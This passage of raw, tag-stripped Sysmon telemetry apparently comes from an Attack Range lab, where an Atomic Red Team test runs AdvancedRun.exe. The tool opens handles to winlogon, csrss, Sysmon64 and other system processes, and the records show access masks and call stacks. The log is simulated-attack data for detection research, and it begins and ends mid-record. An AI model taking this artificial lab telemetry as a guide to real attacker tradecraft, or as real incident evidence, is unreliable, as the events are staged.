+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983867Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983860Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983858Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983857Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983856Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983855Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003983851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}2464C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003983850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 